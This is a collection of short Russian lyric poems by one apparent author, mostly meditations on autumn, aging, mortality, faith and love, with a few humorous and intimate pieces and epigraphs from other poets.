Прелюдия к зиме.
Подёнками
Снежинки гибнут в луже…
Последний лист
Без сил летит к земле –
Прикрыть её
От неизбежной
Стужи.


Сентиментальным стал с годами...

Сентиментальность нынче не в чести…
Юрий Каплан

Сентиментальным стал с годами,
Доверчивей и мягче стал.
Мирюсь с давнишними врагами,
Прощаю тех, кто досаждал.
Винюсь и каюсь – не безгрешен.
Зло выскребаю из души.

Как в этот год цвели черешни!
Как маки были хороши!
Вбираю прелести природы,
Слежу цветение земли.
А годы, словно пароходы,
Уже прошли…


Не держу на попутчиков злобы...

Не держу на попутчиков злобы.
Попривык к плацкартной езде.
Нет такого поезда, чтобы
Он стаканами не звенел.

Что за свадьба, коль нету драки!
Что за ярмарка без матерка!
Пусть грызёмся, аки собаки,
Слава Богу, живы пока.


Лесоруб

Не спеша заглушил мотор.
Навалился плечом – пошла!
С шумом рухнул небесный простор
В ту прореху, где крона была.

Лес от страха стал сам не свой.
Замер, взгляд кося на пилу.
Ну а он – с ладоней травой,
Словно кровь, оттирал смолу.


На охоте

Он так доверчиво
В глаза мои глядел
Через сырые
Прутья краснотала,
Что, если б даже
Я курок нажать посмел,
Ружьё бы всё равно
Стрелять не стало.


Признаюсь честно вам, ребята…

* * *

Признаюсь честно вам, ребята:
Писал под водочку стишата.
А на поэмы, как бывает,
Всегда нам водки не хватает.



Подписан закон в поднебесье...

Подписан закон в поднебесье –
В природе сменилась власть.
Лета жаркая песня
Остыла, как страсть.

Отрезвляет осенняя сырость.
Вот и вся недолга…
Над землёю – немо и стыло –
Зреют снега.


На меже

Всё уже круг, всё уже,
Не вырваться уже.
Но не вселяет ужас
Стоянье на меже.

Приходит пониманье:
Всему есть в жизни срок.
Ждёт часа увяданья
Любой земной цветок.

Недолог жизни праздник.
Как в сон, глаза смежив,
Легко и без боязни
Мы все сойдём с межи.


Стихи без начала

…долгий дождь мне на щёки уронит
Скорбь промозглых осенних небес,
Душу шорохом лиственным тронет
Листопадом охваченный лес.

Ветер грустный мотивчик насвищет
На исходе ненастного дня,–
И вовеки никто не отыщет
В захолустье ноябрьском меня.


Жизнью пойманный врасплох...

Жизнью пойманный врасплох,
Что ты в жизни значишь?
Силишься, свидетель Бог,
Разрешить задачу.
Силишься найти ответ,
Только нет ответа.
И никто не даст совет,
И подсказки нету…
Тут-то смилуется Бог:
– Что, дружочек, тяжко?
Ладно, подсоблю чуток,
Чудная букашка!


А я хотел бы умереть, как лес…

    Пусть уйду, когда в щедрой природе
    Гибель выглядит как торжество.

    .............................Татьяна Галушко



А я хотел бы умереть, как лес…
Не становясь болезненным и старым,
Лес озаряет синеву небес
Янтарным, ослепительным пожаром.

Лес принимает, словно праздник, смерть,
В своём конце он краше, чем в начале, -
Чтоб никому не вздумалось посметь
Подумать об утрате и печали.


В мир нас впустили...

Есть путь один – ведущий вдаль…

    Лариса Миллер


В мир нас впустили.
В мир нас впустили,
Но ничегошеньки
Не объяснили.

Карты какой
Или схемы – не дали.
…А дали и мрачны,
И призрачны дали.

За горизонтом лишь
Теплится свет.
Идёшь – и не знаешь,
Дойдёшь или нет.


Пора поразительной грусти

Пора поразительной грусти.
Низких небес немота.
Дачное захолустье.
Загородная черта.

Что ещё нужно для счастья?
Осыпанный листьями дом.
Осеннее злое ненастье
За запотевшим окном.

Долгая пауза ночи
В короткой, как жизнь, судьбе.
И ворох стихов - между строчек,
В которых любовь к тебе.


Тоска обезголосевших лесов...

Тоска обезголосевших лесов,
Садов невозмутимое молчанье…
Природа, обнажаясь до основ,
Ждёт не любви, а только – пониманья.

Ни глаз не радуя, не теша слух,
Не вызывая в нас того восторга,
Который перехватывал бы дух,
Она молчит настойчиво и строго.

И, принимая всё таким, как есть,
Вбирая эту паузу земную,
Ты понимаешь, что любую песнь
Молчанье предваряет зачастую.


Кого и как благодарить...

Кого и как благодарить
За солнца свет животворящий,
За гомон галок в голой чаще,
Туман над стынущей рекой,
Хоть режь ножом,– густой такой?

Кого и как благодарить
За предсказания кукушки,
За всклень налитые волнушки
Студёной утренней росой,
За этот лёт листвы косой?

Кого и как благодарить
За продувные эти дали,
Которые дожди застлали
Сырой и серой пеленой,
Пропахшей горечью грибной?

Кого и как благодарить
За счастье в этом мире жить
И ко всему причастным быть?
За то, что всё сложилось так,
Кого благодарить и как?


Листопад на земле, листопад...

Листопад на земле, листопад.
Словно лето, жизнь канула в Лету.
Стаей воронов мысли кружат –
Панацеи от памяти нету.

Листопад на земле, листопад.
Время замки воздушные рушит.
К светлой цели бреду наугад,
Обдирая о тернии душу.

Листопад на земле, листопад.
Всё разорвано, скомкано, стёрто.
Разъясните мне, кто виноват,
Что не верю ни в Бога, ни в чёрта.

Листопад на земле, листопад.
Неуютно и холодно в мире.
От бессилия губы дрожат
И рвут руки струны на лире.


Незнакомке

Не скрывай красоту!
Ей дано это право – тревожить.
На житейском мосту
Продувают невзгоды до дрожи.
В круговерти земной
Остужается рано цветенье…
Одари красотой,
Растревожь на мгновенье!


Печаль твоя и радость...

Л.Т.

Две скрипки на стене –
Печаль твоя и радость.
Две скрипки – две любви,
Два трепетных крыла.
Две трудных ноты «боль»
Семейного разлада,
Которые судьба
Из сердце извлекла.

Две скрипки на стене.
На выцветших обоях,
Петлёю – за колки,
Две крохотных души,
Рождённые одной
Великою любовью,
Что век не разменял
На славу и гроши.


Какая счастливая участь...

Какая счастливая участь –
Оставить загадочный след.
Непризнанностью не мучась,
Раздаривать радостно свет.

Не ждать, что поймут и поверят
В слова, что так трудно дались,
Не ждать, пока славой повеет
Из призрачно серой дали.


Краткосрочная утеха

Жизнь - что съёмное жильё -
Краткосрочная утеха.
Обустроишь, как своё,
А тебя попросят съехать...


Нам не дано уразуметь...

Нам не дано уразуметь,
Зачем живём на белом свете
И для чего мгновенья эти
Стремимся мы запечатлеть.

Нам не дано уразуметь,
Зачем натужные старанья
Добыть о мирозданьи знанья,
Когда в итоге – только смерть.

Нам не дано уразуметь,
Кто заставляет лезть из кожи,
Доказывать, что вправду можем
И нам дано уразуметь.


Не дорос...

Не дорос до великих,
Не дорос...
Не до роз!


Черта с два!..

Кефир, не водка - в холодильнике.
Творог, не шматы ветчины...
Теперь уже не собутыльники,
А собеседники нужны.

Нужны друзья, а не приятели,
Дела важны, а не слова...
Мы столько попусту растратили,
Восполнишь - дудки. Чёрта с два!..


Голь небесная

Тучи -
Рваные, будто онучи.
О небесная голь!
Звёзд роса студит месяц -
Жёлтую Бога мозоль.


Нет покоя в мире этом...

Нет покоя в мире этом.
Жизнь на ниточке висит...
Кто-то пальчиком планету,
Как брелочек, теребит.

Торк - сметает всё цунами...
Торк - в руинах города...
Господи, играть-то нами
Перестанешь ли когда!


Выхолодив душу до основы...

Выхолодив душу до основы,
Новых не навеяв впечатлений,
Откружив последний лист кленовый,
Догорел последний день осенний.


Осеннего дня холодок...

Осеннего дня холодок.
Замёрзшей листвы крушенье...
Невольно подводишь итог,
Вязнешь в мыслесмешении.

Бредёшь по тропинке рябой,
Ломаешь ледочек хрусткий,
И псом семенит за тобой
Какой-то мотивчик грустный.


Бабье лето

Из рос рассветных, из тепла и света
Проворным паучком серебрянная нить
В иголочку дождя искусно вдета -
Чтобы могла земля наряд осенний шить.


Задыхаюсь от тоски...

Задыхаюсь от тоски.
Грусти плотные мазки
Жизнь на холст души наносит.
Неуютно и несносно...
Дождь холодный жжёт виски -
На пригорке у реки
В стылой роще безголосой
Мокрый вальс играет осень.


Мир наших снов

Мир наших снов – нашествие извне,
Вневременное действие и тайна.
Мир наших снов – реальный мир вполне,
Хоть наше в нём участие случайно.

Исследованье смысла лишено,
Стараться тщетно, да и толку в том нет:
Мир снов придуман Господом давно,
Спроси – зачем? – он сам сейчас не вспомнит.


Бывает…

* * *

                                                  Л. С.

 

Бывает такое, когда
………….……и малая боль невтерпёж.

Бывает – твои слова
………….……ранят страшнее, чем нож.

Бывает, просто невмочь
………….……сделать единственный шаг;

Кому-то спешишь помочь –
………….……не успеваешь никак…

На искренность – ложь в глаза.
………….……Кого и за что винить?

Бывают минуты, когда
………….……не можешь друга простить.

Бывает, тонешь в себе,
………….……и нет никого вокруг.

Бывает обидно вдвойне
………….……от лживо протянутых рук.

 

 



Песенка

Пора листопада,
Пора листопада...
Рушится крон
Золотая громада.

Шуман и шелест,
Шорох и Лист
Перемешались,
Пересеклись...

Отрада душе,
Для сердца – услада.
Пора листопада,
Пора листопада...


Упрямцы

Ничьим не следуя советам,
Бредём на ощупь в мире этом.

Предупрежденьям не внимая,
Всечасно шишки набиваем.

С пути сбиваемся, упорно
Не замечая знак условный...

Вот так и движемся упрямо.
Куда - незнамо.


В незнакомом ночном городе

Темнеет.
Тишиной наполняются улицы.
Фонари,
………..словно филины,
…………………………..жмурятся.
Одиноко.
Навстречу прохожие –
Незнакомые,
……………..все похожие,
Стороной
………….обходящие лужицы…

В свежем воздухе
…………………..листья кружатся.
Листья кружатся,
…………………..кружатся…

Магазины
………….глазами-витринами,
Как циклопы,
……………...на площадь пялятся,
А за ними –
…………….жильцы витринные –
Манекены
…………..в нарядных платьицах.

Все протягивают
………………….руки бесплотные,
И в меня
………...они тычут пальцами:
В этом городе
………………кто ты,
………………………прохожий,
Уходящий
……….….спящим
…………………...бульварцем?

Листья кружатся,
…………………..кружатся.
Как и все,
………….обхожу я лужицы.
Фонари,
………..словно филины,
…………………………..жмурятся.
Я бреду
……….незнакомой улицей.
Листья кружатся,
…………………..кружатся,
……………………………...кружатся…


А свой уход нам не дано узнать...

А свой уход нам не дано узнать.
Случится всё само собою.
Смежишь навеки веки – и опять,
Как в жизни, обернётся всё игрою…

И слава Богу, что не ощутишь
Когда и как пересечёшь границу
Меж тем, что все мы называем «жизнь»,
И миром, где мы все – его частицы.


Акростих

Шорох и шелест. Неспешные мысли
Искрами тают в октябрьской прохладе.
Под ноги стелются мокрые листья –
Угли остывшие старого сада.

Серо и стыло. Стремленье к покою…
Еле заметная нить паутинки
Режет, как масло режут струною,
Глыбу эфира на тонкие льдинки.
Елко и волгло. В костре краснотала
Юркою ящеркой лето пропало.


Узелки на память

* * *
Одиночество – это когда
даже Бог не слышит
твоей молитвы.

* * *
Подарить малой планете
своё имя –
не так уж и мало!

* * *
Поэзия – айсберг.
Видна только сила,
но скрыты усилья.


Снова осень осыпает...

Снова осень осыпает
Листья в мокрую траву.
Час сомнений наступает:
Так ли, тем ли я живу?

Ту ли я дорогу выбрал,
Дело ль то, что по плечу?
Не искал ли в жизни выгод?
Коль искал, то почему?

Кто я, что я, и зачем я?..
На осеннем на ветру
Снова сыплются с деревьев
Листья в мокрую траву.


На письменном моём столе...

На письменном моём столе
серая-серая пыль.
Вчера написал на ней:
Муза,
ау!


Диптих

1.

Груди твои -
два птенца
в гнёздах моих ладоней.

2.

Затаив дух,
двух остроклювых голубок
лаской пою из ладоней.


Подражание восточному

Мгновенно счастье, если и случится.
Всевышний мудр и, вместе с тем, жесток:
Даёт возможность нам найти его исток,
Но вдоволь не даёт им насладиться.


Хиромантия

Изучаю
твою ладонь.
Хочу знать,
что ждёт меня
завтра.


Всё дольше дожди моросят...

Всё дольше дожди моросят,
Всё дальше отлётные стаи…
Мы тоже осенними стали
Под натиском бед и утрат.

Нас тоже задел холодок,
Как эти деревья и травы.
Врачуя душевные травмы,
Грызём валидола ледок.

Бредём бездорожьем невзгод,
Шагами бессонницу мерим,
Но, как бы там ни было, верим,
Что лучшее время придёт.


За жизнь свою мы отвечаем сами...

За жизнь свою мы отвечаем сами,
Хоть верим в то, что кто-то нас ведёт,
Что этот кто-то нас под небесами
Хранит и длит наш трепетный полёт.

Мы чуем Силу, но наш скудный разум
Познать её не в силах – лишь принять…
А потому никто из нас ни разу
Не ставил под сомненье благодать.


Ничто не сбывается в снах...

Ничто не сбывается в снах,
А наяву – и подавно.
Лучше синица в руках:
Держишь – и славно.

Малому счастью рад,
Каждой его крупице.
И не блуждает взгляд
В поисках большей птицы.

Что из того, что в снах
Бьётся журавль в тучах?
Видно, и впрямь в руках
Синица куда как лучше.


В глуши лесной тоску глушу...

В глуши лесной тоску глушу:
Среди берёзок и осинок
Брожу и листьями шуршу,
Вдали от просек и тропинок.

Молчанье строгое хранит
Сплошь обнажённая природа,
Лишь паутиночка звенит,
Как финишная лента года.



Понемногу светлеет душа...

Понемногу светлеет душа,
Потихоньку душа оживает.
Онемевшие, не спеша
Она крылышки расправляет.

По ночам нестерпимую резь
Меж лопатками ощущаю,
Но, как самую добрую весть,
Каждый день эту боль ожидаю.


Вступаю под сень листопада...

Вступаю под сень листопада,
По никнущим травам иду,-
В плену у осеннего лада,
С собою самим не в ладу.

Прозрачная роща отрадна
Для глаз, а на сердце – тоска.
Октябрьского утра прохлада
Снимает усталость с виска.

Листвы опадающей шорох,
Стекая наклонно с вершин,
Надёжно в незримые шоры
Берёт треволненья души.

Врачую себя листопадом,
По травам поникшим бреду,-
В плену у осеннего лада,
С собою самим не в ладу.


Сквозные шорохи осенние...

Сквозные шорохи осенние.
Дымов отвесное стояние.
Всё ближе с каждым днём забвение,
Короче и бледней сияние.
И, словно прервано дыхание
В момент свободного падения,
Объемлет душу замирание
От листьев смертного парения.


Бог молчалив...

Бог молчалив.
Лишь с поэтами и детьми
Он откровенен.


Я напишу тебя в лесу...

Я напишу тебя в лесу,
Среди пожара красных клёнов,
Чьи ветви зябкие влюблённо
И чуть, быть может, удивлённо
Листочки держат на весу.

Я напишу тебя в лесу,
Пропахшем прелью и грибами,
Где лоси жаркими губами
Пьют, наклонившись над ручьями,
Небес остывшую красу.

Я напишу тебя в лесу,
Распахнутом ветрам навстречу,
В косынке, сброшенной на плечи.

С корзинкой крохотной в ручонке,
Красивой рыжею девчонкой
Я напишу тебя в лесу.


Баба-Яга

Соседский мальчишка – трёхлетний Егор –
Дворничиху дразнит Бабой-Ягой.
Иду на работу – в колодце двора
Она, как у ступы, стоит у ведра.
Стучит по асфальту длинной метлой
И шепчет, качая седой головой:
– Совсем уже стёрлась – надоть менять.
Разве на ентом можно летать!


Тропинка, поле, неба просинь...

* * *


Тропинка.
………….Поле.
………………..Неба просинь.
Вдали –
………взъерошенный лесок…
Ну, как вместить мне
………………………эту осень
В столбцы скупых
…………………и ломких
………………………….строк?

Как отыскать слова,
……………………..в которых
Ожил бы
………...паутинки звон,
И шёпот трав,
……………..и листьев шорох,
И трепет
………..обнажённых крон?

Как передать
……………..всё то,
…………………….что вижу,
И то,
……что у меня в груди?..
Холодный ветер
…………………щёки лижет,
Темнеют лужи впереди.

Бреду
……..заглохшею тропинкой,
Шепчу
……...какие-то слова.
И
...от надкушенной травинки –
Слегка
………кружится
…………………голова!


Ты через голову снимаешь платье...

Ты через голову снимаешь платье.
А мне всё кажется,
что чьи-то незримые руки
из мешочка тончайшего шёлка
бережно вытряхивают
красоту.


Пишу в миноре, а живу в мажоре...

Пишу в миноре, а живу в мажоре.
То слёзы лью, то песенки пою.
Но в нашем общем, пусть нестройном, хоре
Я каждого по-своему люблю.

Да будет в радость вам своя дорога,
И выдастся в награду звёздный час.
Молю за всех я Праведного Бога,
Чтоб битой быта не убило нас.


Две скрипки на стене...

Л.Т.

Две скрипки на стене –
Печаль твоя и радость.
Две скрипки – две любви,
Два трепетных крыла.
Две трудных ноты «боль»
Семейного разлада,
Которые судьба
Из сердце извлекла.

Две скрипки на стене.
На выцветших обоях,
Петлёю – за колки,
Две крохотных души,
Рождённые одной
Великою любовью,
Что век не разменял
На славу и гроши.


Живём...

Живём,
Хоть кажется,
Жить невозможно.
Поём,
Хоть, казалось бы,
Время для слёз.
И нам
Воздаётся
Милостью Божьей,
Ведь ТАМ
Принимают всё это
Всерьёз.


Трилистник

*
Сухой листок
в капюшоне дождевика.
Не отыскав карман,
опустила в него
визитную карточку
осень.

* *
Мокрым утёнком
прошлёпала осень по парку.
Под каждым клёном –
следы перепончатых лапок.

* * *
Голубь
в осенней
сини.

Стынет,
как ангел
голый.


Ты любишь мягкие подушки...

Ты любишь мягкие подушки, –
Чтоб утопать в них
…………………….с головой!
Вот и сейчас,
……………...с серёжкой в ушке –
Горящей
………...крохотной звездой,
Раскинув руки,
………………..спишь так сладко,
Вся погрузившись
…………………...в лёгкий пух.
А я,
…..от месяца украдкой,
Целую,
……….затаивши дух,
Тебя в обветренные губы.
И в этот,
………...в этот самый миг
Мне кажется,
……………...что слишком грубы
Подушки мягкие
………………….для них.


Ночная бабочка в окно...

Ночная бабочка в окно
Скребётся лапкою мохнатой,
И невдомёк ей, что оно,
Когда распахнуто,- чревато.

Ведь эта лампа на столе,
Что тихий свет в ночи роняет,
Ничто не греет на земле,
Лишь только крылья обжигает…


Сильней нас делают ушибы

* * *

 

                   Пережитые беды

                   становятся силою…

                                  Р. Казакова

 

 

Всё – заново.

И с тем смирись.

Сильней нас делают ушибы.

Когда бы не было ошибок,

То чем бы нас учила жизнь?

 



Ничего не изменить, я знаю...

* * *

Ничего не изменить, я знаю.
Жизни круг по новой не пройти.
Как свечной огарок, догораю,
И хотя почти не освещаю,
Продолжаю всё-таки светить.

_______________________________


Ночь

Тонуло солнце
В розоватой пене,
И с каждым мигом
Становилось всё темней,
И от деревьев
Простирались тени,
Сминая травы
Тяжестью своей.

Клубился пар
Над стынущим затоном,
Пах воздух тиной
И сырым песком.
Как жемчуга,
Росли росинок звоны
В цветах,
Сомкнувших створки
Лепестков.

Ну а когда,
Сломившись тонкой спицей,
Последний луч
Во мраке потонул,–
Над миром
Взмыла ночь
Огромной птицей,
Держа в когтях
Прозрачную
Луну.


Вечность призрачна и мнима...

Вечность призрачна и мнима.
Быт берёт нас в оборот.
Сложно слыть неуловимым
Для несчастий и забот.

Крутит жизнь свою шарманку,
И чем дальше – меньше шарм.
Кто узнал её изнанку,
Тот сплошной увидел шрам.

И тревоги, и напасти.
Сутолока, маета…
А мы всё стремимся к счастью,
Восклицаем: «Лепота!»


Был бы хлеб, была бы вода...

Был бы хлеб, была бы вода,
А что соли нет – не беда.
Ведь, по правде если сказать,
Вносит соль в рацион слеза.
Искони на Руси велось:
Соль скрипит на зубах от слёз.
Затянув поясок живём.
Хлеб жуём да водицу пьём.
Даже ежели слёзы льём,
Не скулим, а поём.


Нет, написать, что жизнь нелепа...

* * *
Нет, написать, что жизнь нелепа,
Не поднимается рука,
Хоть и поверить в счастье слепо
Не получается никак.

Пусть часто обложные тучи
Скрывают чудо синевы,
Я верю в то, что будет лучше.
А вы?..


Чудный мир

Пускай не я, пускай другой,
Дожив, поймёт, зачем всё это…

............................Василь Дробот

Как устроен он – не знаю.
Всё за чудо принимаю.
Всё приемлю, изумлён,
Тайной тайн заворожён.

Принимаю, принимаю,
Хоть совсем не понимаю,
Для чего он сотворён
И на кой я, глупый, в нём.


Только ахи, только охи…

* * *
Только ахи, только охи…
На крутом ветру эпохи
Каждый, словно лист, дрожит –
Скудным скарбом дорожит.
Каждый держится за быт,
Хоть не раз был бытом бит.
Цепко держится. Боится
В круговерти очутиться.
И рождают наши страхи
Только охи, только ахи.


Жить дано отсель досель...

* * *
Будем плакать и жить…
Светлана Кекова

Жить дано отсель досель,
Ни мгновенья дольше.
Верил в это, а теперь
Верю даже больше.

Верю в это, но теперь
Несколько иначе:
Жить дано отсель досель,
Да всё время – плача.

Слёзы горькие лия,
Счастья слёз не пряча,
И моля, чтоб колея
Выдалась удачной.


Романс

Сотри с моей души
Наплыв внезапной грусти,
Прохладная ладонь
Кленового листа.
Крылом разрезав синь,
Летят над миром гуси,
Покинув до весны
Родимые места.

Не знаю, доживу ль
До следующей встречи,
Не знаю, как со мной
Поступит мудрый Бог.
Что выпадет в судьбе:
Счастливый чёт иль нечет?
Перешагну ль зимы
Заснеженный порог?

Прозрачная пора
Стоит над милой Русью,
Распахнутая даль
Торжественно чиста…
Сотри с моей души
Наплыв внезапной грусти,
Прохладная ладонь
Кленового листа.


Живём сегодня и сейчас...

* * *
Живём сегодня и сейчас.
Никто за это не осудит,
Ведь невдомёк, что завтра будет,
Чем новый день чреват для нас.

Живём сегодня и сейчас.
Стараясь вдоволь насладиться,
Не оставляя ни крупицы,
Ни крошки лишней про запас.

Живём сегодня и сейчас.
Живём и верим простодушно:
Бог милосердный чад тщедушных
Простит и мукам не предаст.

Живём сегодня и сейчас.


Теперь я понял, кем с тобою были мы...

* * *
Теперь я понял,
Кем с тобою были мы –
Две птицы
Из одной огромной стаи.
Мы лишь коснулись
Трепетными крыльями
Друг друга –
И навек расстались.